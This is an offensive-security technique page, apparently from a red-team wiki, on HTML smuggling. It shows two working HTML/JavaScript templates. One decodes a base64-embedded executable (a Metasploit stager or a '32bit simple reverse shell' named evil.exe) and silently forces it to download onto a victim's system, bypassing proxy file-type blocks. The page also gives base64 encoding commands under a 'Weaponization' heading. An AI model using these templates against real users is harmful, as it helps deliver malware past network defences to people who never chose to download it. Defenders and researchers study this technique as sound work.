Secondary Categories: 02-Social Engineering
Description:
This technique leverages the HTML5 anchor tag download attribute,which instructs the browser to automatically download a file when a user clicks the assigned hyperlink.
<html>
<body>
<a href="/msfstaged.exe" download="msfstaged.exe"\>DownloadMe</a>
</body>
</html>When a user clicks this link from an HTML5-compatible browser, the msfstaged.exefile will be automatically downloaded to the userβs default download directory.
Although this works well, it exposes the filename and extension of the dropper and requires the user to manually click on the link. To avoid this we can trigger the download from an embedded JavaScript file. This method feeds the file as an octet stream and will download the assembled file without user interaction.
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary\_string = window.atob(base64);
var len = binary\_string.length;var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++)
{
bytes\[i\] = binary\_string.charCodeAt(i);
}
return bytes.buffer;
}
var file = <FILE IN BASE64>
var data = base64ToArrayBuffer(file);
var blob = new Blob(\[data\], {type: 'octet/stream'});
var fileName = 'msfstaged.exe';
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>In order to get theis to work with Microsoft Edge you must use window.navigator.msSaveBlob
EXTENDED
HTML smuggling is a technique that allow bypassing proxy blocks for certain file types that the user is trying to download. You can use HTML smuggling to force the user to download those files onto the system.
Weaponization
First we need to base64 encode our file(s).
base64.exe evil32.exe > .\evil.txtcat evil32.exe | base64 > b64-payload.txt
Then we just insert the file into our HTML file and utilize javascript to decode the string and download it to the victims system.
<!-- code from https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
// 32bit simple reverse shell
var file = '<BASE64-FILE>';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'evil.exe';
if (window.navigator.msSaveOrOpenBlob) {
window.navigator.msSaveOrOpenBlob(blob,fileName);
} else {
var a = document.createElement('a');
console.log(a);
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>Resources:
| Title | URL |
|---|---|
| Outflank - HTML Smuggling | https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ |
Also Check Out:
- Placeholder